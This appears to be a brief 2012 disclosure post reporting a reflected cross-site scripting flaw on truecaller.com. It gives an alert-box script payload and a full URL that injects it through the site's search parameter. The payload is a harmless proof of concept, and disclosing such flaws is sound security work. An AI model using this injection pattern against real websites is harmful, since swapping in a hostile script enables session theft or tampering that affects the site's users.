Truecaller.com suffers from a cross site scripting vulnerability.
089df9f4921238950fae42d21ad63fc3fa78dfa1565e1542b8cfb050609324a4
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
WhiteHatZone
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# Exploit Title: XSS vulnerability in Truecaller.com
# Date: 06/01/2012
# Author: Girish Shrimali
# Website: http://whitehatzone.blogspot.com
# Tested On: Win7
# Email: gjshrimali@gmail.com
# Google Dork : truecaller
##############################################################################################################
>>> Vulnerable : http://www.truecaller.com/
>>> Script : <script>alert('XSS found by Girish Shrimali');</script>
>>> Vulnerable link : http://www.truecaller.com/?p=number_search&country=India-Ahmedabad&q=%3Cscript%3Ealert%28%27XSS+found+by+Girish+Shrimali%27%29%3B%3C%2Fscript%3E&x=17&y=10
##############################################################################################################
Greetz : Vidit Baxi, Sumit Pareek